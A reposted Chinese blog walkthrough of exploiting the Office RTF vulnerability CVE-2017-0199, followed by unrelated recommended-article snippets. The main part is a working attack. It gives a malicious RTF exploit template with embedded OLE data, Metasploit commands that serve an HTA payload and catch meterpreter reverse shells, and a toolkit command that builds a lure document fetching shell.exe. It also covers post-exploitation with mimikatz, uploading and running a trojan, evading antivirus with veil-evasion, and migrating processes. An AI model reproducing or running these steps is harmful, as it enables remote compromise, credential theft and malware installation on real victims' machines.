ms17_0199样本测试

最新推荐文章于 2024-05-29 23:41:42 发布
最新推荐文章于 2024-05-29 23:41:42 发布
阅读量103 收藏
点赞数
文章标签: python shell 网络
原文链接:http://www.cnblogs.com/whoami101/p/6727475.html
版权

一大早就各种消息弹框,于是就来测试一波

https://github.com/nixawk/metasploit-framework/blob/8ab0b448fdce15999f155dfd7b22479e5f79de3a/modules/exploits/windows/fileformat/ms17_0199_rtf.rb

增加如下文件:/usr/share/metasploit-framework/data/exploits/cve-2017-0199.rtf

{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe2052\themelang1033\themelangfe2052\themelangcs0
{\info
{\author CVE-2017-0199}
{\operator CVE-2017-0199}
}
{\*\xmlnstbl {\xmlns1 http://schemas.microsoft.com/office/word/2003/wordml}}
{
{\object\objautlink\objupdate\rsltpict\objw291\objh230\objscalex99\objscaley101
{\*\objclass Word.Document.8}
{\*\objdata 0105000002000000
090000004f4c45324c696e6b000000000000000000000a0000
d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
fffffffffffffffffdfffffffefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000003000000000000c000000000000046000000000000000000000000704d
6ca637b5d20103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000
000000000000000000000000f00000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000
0000000000000000000004000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000
00000000000000000000000005000000b700000000000000010000000200000003000000fefffffffeffffff0600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
MINISTREAM_DATA
0105000000000000}
{\result {\rtlch\fcs1 \af31507 \ltrch\fcs0 \insrsid1979324 }}}}
{\*\datastore }
}

 

use exploit/windows/misc/hta_server

run

[*] Started reverse TCP handler on 192.168.31.122:4444
[*] Using URL: http://0.0.0.0:8080/6gOqrxRSEWc3LB.hta
[*] Local IP: http://192.168.31.122:8080/6gOqrxRSEWc3LB.hta

会自动监听端口

其实也可以:

use exploits/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 192.168.31.122

set LPORT 4444

run

 

use exploit/windows/fileformat/ms17_0199

set TARGETURI http://192.168.31.122:8080/6gOqrxRSEWc3LB.hta

set FILENAME haha.doc

 run

load mimikatz

msv

cd d:\

upload /root/muma.exe

execute -f muma.exe

据测试下来,成功率不是很高。

 

2.

测试第二波

 apt-get install veil-evasion(kali2安装veil会血崩) 生成一个免杀 use 35

python cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.doc

msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"

msfconsole -r /var/lib/veil-evasion/output/handlers/payload_handler.rc

python cve-2017-0199_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe

msf接收多个session 

exploit -j  后台监听
set ExitSession false

ps

迁移进程

 

migrate 4396   

转载于:https://www.cnblogs.com/whoami101/p/6727475.html

weixin_34270606
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
JMeter压力测试
学Java,找哪吒
06-20 5万+
即TPS:每秒事务数,性能测试中,最重要的2个指标之一。该插件的作用是在测试脚本执行过程中,监控查看服务器的TPS表现————比如整体趋势、实时平均值走向、稳定性等。jmeter本身的安装包中,监视器虽然提供了比如聚合报告这种元件,也能提供一些实时的数据,但相比于要求更高的性能测试需求,就稍显乏力。1、Java:选择压测时,链接是复用的(代码中的http调用都加了连接池)
[系统安全] 二十六.WannaCry勒索病毒分析 (2)MS17-010漏洞利用及蠕虫解析
杨秀璋的专栏
03-01 8391
作者前文采用Github资源实现永恒之蓝漏洞加载WannaCry勒索病毒,并实现对Win7文件加密的过程,但过程较为复杂,为什么不直接利用永恒之蓝呢?所以,这篇文章将直接分享MSF利用MS17-010漏洞进行反弹Shell,再上传勒索病毒进行实验复现,并详细讲解WannaCry勒索病毒的原理。基础性文章,希望对您有所帮助。
TOP100summit 2017:亚马逊Echo音箱能够语音识人,华人工程师揭秘设计原理
weixin_33778778的博客
10-17 118
2017年,人工智能的消费产品落地聚焦在了智能音箱上,谷歌、亚马逊纷纷推出智能音箱产品,国内的阿里巴巴推出天猫精灵,小米推出小米AI音箱。智能音箱通过语音可以发出指令,未来可能成为智能家居的入口,通过语音控制家里的其他智能设备。 几个月前谷歌的语音识别应用推出支持个性化语音识别功能,而本周三,也就是10月11日,亚马逊的Echo音箱也具...
补做- 第五次实验-项目五
qq_37630145的博客
05-08 190
一、问题及代码 [cpp] view plain copy /*  * 文件名称:Exbz5-5.cpp  * 作    者:程家琦  * 完成日期:2017 年 5 月 8 日  * 版 本 号:v1.0  * 对任务及求解方法的描述部分:  * 输入描述: * 问题描述:C++中提供了多种基本的数据类型。实际上,这些远不能满足我
记一次云计算测试实验-openstack-icehouse-compute节点初始化
weixin_34080903的博客
06-03 86
#个人一点习惯,不关掉点什么总觉的有点不顺畅。service iptables stopchkconfig iptables offsetenforce 0vi /etc/sysconfig/selinuxgetenforcePermissivevi /etc/sysconfig/network-scripts/ifcfg-eth0vi /etc/sysconfig/netw...
教学管理系统-实验五(选做) 活动图
qq_41871094的博客
06-01 5753
真题选做
weixin_34190136的博客
05-26 106
[NOIPTG2017] 小凯的疑惑 题意   小凯有两种面值的金币,每种金币有无数个,求在无法准确支付的物品中,最贵的价值是多少金币。 分析   设两种金币面值分别为 $a$ 和 $b \; (a<b)$ ,答案为 $x$,则有$$x \equiv ma \, (mod \; b) \; (1 \leq m\leqb-1)$$   即$$x=ma+nb \; (1 \leq ...
tcga样本编号_TCGA样本命名详解
weixin_31156651的博客
01-14 5965
在TCGA中,一个患者可能会对应多个样本,如TCGA-A6-6650可以得到3个样本数据:TCGA-A6-6650-01A-11R-1774-07TCGA-A6-6650-01A-11R-A278-07TCGA-A6-6650-01B-02R-A277-07大家知道一般在做TCGA数据分析的时候样本名实际上只保留到前四个元素(以”-“分割),例如TCGA-A6-6650-01。所以实际上上示3个样...
jmeter5.1_压力测试基础(理论部分)
那一缕寒意,冰封千里
07-05 2269
jmeter5.1_使用参考手册 本文介绍如何使用jmeter 做WEB压力测试的一些基础知识. 如对JM了解已经有一定了解了,可以直接看下以章   抱歉,前段时间工作比较忙,没有更新。   编写不易,求关注!!! Test plan building(测试计划建设) 你可以打开你的GUI然后点击“文件”→“模板”→“Recording”等等去录制一个脚本文件。 也可以自己创建一个测试计划 备...
基于Python_MATLAB的常见茶叶中重金属元素的ICP-MS检验研究.pdf
06-23
经过前处理后采用电感耦合等离子体质谱仪(ICP-MS)同时对37种茶叶进行五种常见重金属铬(Cr)、砷(As)、铅(Pb)、镉(Cd)和汞(Hg)含量的检测,使用MATLAB进行主成分分析和聚类分析,使用Python设计识别界面实现测试样本的...
RMAOV1MS:重复测量方差多样本的单因素分析-matlab开发
06-01
这个 m 文件处理从 s 组受试者或多个样本获得的 t 时间点的重复测量。 有或没有相同的尺寸。 最简单的模型是: x_hij = m + g_h +t_j + (gt)_hj + p_i(h) + e_hij 其中: x_hij = h 组中第 i 个受试者在时间 j 的...
studydrive_upload_documents_test:studydrive任务-上载文档的自动化测试
03-21
自动化测试-样本工作-JUnit 5,Selenium,Robot框架,Java studydrive任务-上载文档的自动化测试 可以在以下位置找到测试文件: ://1drv.ms/u/s!AgUPuSHY5qG123afVemVdUlc6AI6?e=ugPkeO请上传文件夹并更改以下文件...
LnT_Miniproject_AnushaD
04-16
要求 捕获系统,模块,接口,集成,测试,功能和非功能的所有要求 通过以下示例获取项目的基本计划-附有甘特图样本 工具:MS Excel,MS word或类似工具
ICPMS-data-analysis-scripts:ICP-MS数据分析的完整脚本和支持文档
03-30
“ Sample_run_HeavyMetalstest_modified.csv”包括样本数据以测试重金属脚本(镉/镉,铅/铅,汞/汞)。 “ Sample_run_test.csv”和“ Sample_prep_test.csv”包括用于测试其他脚本(铁/铁,锌/锌)的样本数据。
深入理解Python中None和““的区别
m0_54701273的博客
05-27 485
Python的世界里,None和空字符串""经常被用作默认值或用于表示缺省值的情况。尽管它们在某些语境下似乎可互换,但实际上None和""在Python中有着根本的区别。
nss刷题(关于ssti)
2302_79119987的博客
05-23 1205
-script-args n1=v1,... : 给脚本传递参数. ie. --script-args grep.regex="<A href=\"(.*?--hc/hl/hw/hh N[,N]+ : 以指定的返回码/行数/字数/字符数作为判断条件隐藏返回结果 (用 BBB 来接收 baseline)--sc/sl/sw/sh N[,N]+ : 以指定的返回码/行数/字数/字符数作为判断条件显示返回结果 (用 BBB 来接收 baseline)
提取COCO 数据集的部分类
qq_53682472的博客
05-24 775
若报错,pip install git+https://github.com/philferriere/cocoapi.git#subdirectory=PythonAPI。注意skimage用pip install scikit-image -i https://pypi.tuna.tsinghua.edu.cn/simple。安装pycocotools github地址:https://github.com/philferriere/cocoapi。实在不行的话,手动下载。
微信小程序uniapp+django洗脚按摩足浴城消费系统springboot
QQ1304979694的博客
05-24 768
Python语言官方规范访问数据库的统一接口规范(Python DB-API),防止在使用不同数据库时,由于底层数据库技术不同造成接口程序紊乱的问题。(3)项目初期开发,美工设计,前端实现,开发信息系统的用户功能的实现,完善界面排版,实现信息提取发送等一系列功能。项目系统最后阶段的修改及最终测试运行。当然,在研究过程中也可以直接调查,对调查搜集到的资料进行综合分析、比较,调查法是科学研究中普遍的研究方法。(5)系统测试:对设计好的程序进行最终调试,通过调试发现存在的问题并解决,从而达到完善系统的目的。
基于python flask+pyecharts实现的中药数据可视化大屏,实现基于Apriori算法的药品功效关系的关联规则
最新发布
weixin_49081159的博客
05-29 551
在中医药学中,物品与功效之间的关联关系研究是一个非常重要的课题。传统中医药学中,很多药物都具有多种功效,而且不同药物对同一种疾病可能具有不同的疗效。因此,挖掘物品与功效之间的关联关系,可以帮助我们更加准确地认识和应用中医药宝库中的药物,从而提高中医药学的治疗效果和水平。随着信息技术的快速发展,Python作为一种流行的编程语言,已经被广泛应用于中医药学领域。Python具有丰富的第三方库和工具,例如NumPy、Pandas、Matplotlib等,这些库和工具为中医药学数据挖掘提供了丰富的工具和支持。
mscoco online
01-01
总之,MSCOCO在线数据集通过提供大规模、多样化的图像资源,为计算机视觉任务提供了丰富的训练和测试样本。它的在线特点使得研究人员可以随时利用最新的图像数据进行研究,并能够获得更准确的图像分析结果。MSCOCO...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值